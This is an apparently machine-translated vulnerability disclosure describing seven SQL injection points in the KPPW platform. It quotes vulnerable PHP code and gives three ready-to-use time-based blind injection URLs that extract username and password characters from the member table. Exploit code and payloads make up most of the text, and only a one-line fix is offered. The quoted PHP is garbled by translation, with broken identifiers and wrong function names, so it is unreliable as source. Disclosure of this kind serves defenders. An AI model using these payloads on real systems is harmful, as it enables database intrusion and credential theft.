KPPW latest SQL injection vulnerability 7 (multiple injection points)

KPPW latest SQL injection vulnerability 7 (multiple injection points)

KPPW Latest Version SQL injection vulnerability 7, multiple injection points

First, SQL injection:

File/control/user/transaction_works.php:

If ($ action = 'delete _ image') {$ strSql = sprintf ("select file_id, file_name, save_name from % switkey_file where file_id in (% s)", TABLEPRE, $ fileid); $ arrFileInfo = db_factory: get_one ($ strSql); $ resText = CommonClass: delFileByFileId ($ fileid); if ($ resText) {$ array = explode (',', $ arrServiceInfo ['pic ']); $ newArr = CommonClass: returnNewArr ($ arrFileInfo ['Save _ name'], $ array); $ _ POST ['file _ id'] = implode (",", $ newArr); updateFilepath ($ arrServiceInfo ['service _ id'], $ _ POST ['file _ id'], 'pic '); kekezu: echojson ('deleted successfully', 1, array ('fileid' => $ fileid, 'Save _ name' => $ arrFileInfo ['Save _ name']); die ;}}

Note:

$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid);

$ Fileid without quotation marks protects the SQL statement, resulting in Injection



Second, three SQL injections:

Continue with the following:

$resText = CommonClass::delFileByFileId($fileid);

$ Fileid continues to enter the delFileByFileId function. Follow up with the delFileByFileId function:

File:/lib/inc/CommonClass. php

public static function delFileByFileId($fileId){$strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId);$arrFileInfo = db_factory::get_one($strSql);$filename = S_ROOT.$arrFileInfo['save_name'];if(file_exists($filename)){unlink($filename);}return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId);}

There are two injections here. The $ fileid variable is not processed in the select and delete statements, resulting in SQL injection.



Fourth, Five, Six SQL injection:

The consent issue occurs in the file/control/user/transaction_works.php:

If ($ action = 'delete _ goodsfile ') {$ strSql = sprintf ("select file_id, file_name, save_name from % switkey_file where file_id in (% s)", TABLEPRE, $ fileid); $ arrFileInfo = db_factory: get_one ($ strSql); $ resText = CommonClass: delFileByFileId ($ fileid); if ($ resText) {$ array = explode (',', $ arrServiceInfo ['file _ path']); $ newArr = CommonClass: returnNewArr ($ arrFileInfo ['Save _ name'], $ array); $ _ POST ['file _ path_2 '] = implode (",", $ newArr); updateFilepath ($ arrServiceInfo ['service _ id'], $ _ POST ['file _ path_2 '], 'file'); kekezu: echojson ('deleted successfully', 1, array ('fileid' => $ fileid, 'Save _ name' => $ arrFileInfo ['Save _ name']); die ;}}

The problem here is the same as the problem analyzed above. Injection exists.



Seventh, SQL injection:

File/control/user/transaction_works.php:

If (isset ($ formhash) & kekezu: submitcheck ($ formhash) {$ arrGoodsConfig = unserialize ($ kekezu-> _ model_list [6] ['config']); $ goodsprice = floatval ($ goodsprice); $ floatMinCash = floatval ($ arrGoodsConfig ['min _ cash ']); if ($ floatMinCash & ($ goodsprice <$ floatMinCash )) {$ tips ['errors '] ['goodsprice'] = 'minimum value cannot be less '. $ floatMinCash. 'meta'; kekezu: show_msg ($ tips, null, NULL, NULL, 'error');} if (strtoupper (CHARSET) = 'gb K') {$ goodsname = kekekezu: utftogbk ($ goodsname); $ goodsdesc = kekezu: Orders ($ goodsdesc); $ unite_price = kekezu: Orders ($ unite_price );} $ arrData = array ('model _ id' => $ arrServiceInfo ['model _ id']? $ ArrServiceInfo ['model _ id']: 6, 'uid' => $ gUid, 'username' => $ gUserInfo ['username'], 'indus _ id' => $ indus_id, 'indus _ pid '=> $ indus_pid, 'title' => $ goodsname, 'price' => $ goodsprice, 'pic '=> $ file_ids, 'content' => $ goodsdesc, 'Unite _ price' => $ unite_price, 'submit _ method' => $ submit_method, 'file _ path' => $ file_path_2, 'Confirm _ max '=> intval ($ arrGoodsConfig ['Confirm _ max_day']); if (! $ Pk ['service _ id']) {$ arrData ['profit _ rate'] = $ arrGoodsConfig ['service _ profit ']; $ arrData ['on _ time'] = time (); $ arrData ['service _ status'] = 2 ;}$ objServiceT = new keke_table_class ('witkey _ Service '); $ objServiceT-> save ($ arrData, $ pk); unset ($ objServiceT); if ($ objId & $ intTaskId) {$ strBidSql = 'update ''. TABLEPRE. 'witkey _ task_bid' SET 'hasdel '= 1 WHERE ('bid _ id' = '. $ objId. ') and task_id = '. $ intTaskId; $ strWorkSql = 'update ''. TABLEPRE. 'witkey _ task_work' SET 'hasdel '= 1 WHERE ('work _ id' = '. $ objId. ') and task_id = '. $ intTaskId; db_factory: execute ($ strBidSql); db_factory: execute ($ strWorkSql);} kekezu: show_msg ('Operation succeeded ', $ strJumpUrl, NULL, NULL, 'OK ');}

Note:

$objServiceT->save ( $arrData,$pk);

The variable $ pk enters the save Function and follows up with the save function.

File/lib/inc/keke_table_class.php:

function save($fields, $pk = array()) {foreach ( $fields as $k => $v ) {$kk = ucfirst ( $k );$set_query = "set" . $kk;$this->_table_obj->$set_query ( $v );}$keys = array_keys ( $pk );$key = $keys [0];//echo $key."\n";//print_r($pk);//echo $pk[$key];if (! empty ( $pk [$key] )) {$this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );$edit_query = "edit_" . $this->_pre . $this->_table_name;$res = $this->_table_obj->$edit_query ();} else {$create_query = "create_" . $this->_pre . $this->_table_name;$res = $this->_table_obj->$create_query ();}if ($res) {return $res;} else {return false;}}

The key of $ pk enters the setWhere Condition Statement, resulting in SQL injection.

First, SQL injection:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23

The returned result will be delayed by 5 seconds, indicating that the first character of UserName is a. the user information can be injected after the user continues.



Second, three SQL injections:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)

The returned result will be delayed by 5 seconds, indicating that the first character of UserName is a. the user information can be injected after the user continues.
 

Seventh, SQL injection:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editworkformhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2=

The returned result will be delayed by 5 seconds, indicating that the first character of UserName is a. the user information can be injected after the user continues.

Solution:

Use single quotes to protect your data